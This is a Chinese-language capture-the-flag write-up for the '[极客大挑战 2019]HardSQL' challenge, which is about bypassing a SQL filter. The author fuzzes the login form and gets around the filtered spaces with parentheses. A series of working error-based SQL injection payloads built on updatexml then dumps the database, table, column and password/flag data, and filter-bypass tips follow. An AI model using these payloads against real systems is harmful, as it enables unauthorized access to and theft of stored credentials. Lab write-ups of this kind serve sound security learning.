[极客大挑战 2019]HardSQL
(主要记录一下自己做题的思路)
题目:
打开环境,得到:
废话不多说,都说了是hardsql了,直接fuzz测试一下
可以看到有很多还是没被过滤的,现在就要自己再手动测试一下常见的一些方式了,我这里说下我做这题的思路:
先试着输入了admin' #
,返回了:
说明空格确实被过滤,接着就要想办法绕过空格了,先试着用了下/**/
来绕过空格,发现同样被过滤了
现在只有用()
括号来绕过空格了,这里简单讲下空格绕过的原理:
括号是来包含子查询的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格
试着输入:
发现没有出现那几个汉子,证明绕过了空格
现在仔细观察那个error界面,猜测应该是报错注入,先试试用updatexml
注入看:
admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(select(column_name)from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#
可以拿到一半的flag
然后这里就要补充一点知识了,也可以对上面的payload构造有点理解
1:空格被过滤可以使用/**/或者()绕过
2:=号被过滤可以用like来绕过
3:substring与mid被过滤可以用right与left来绕过
所以这里如果要得到右边的flag的话,就要用right来构造了,直接看构造好的payload:
admin'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#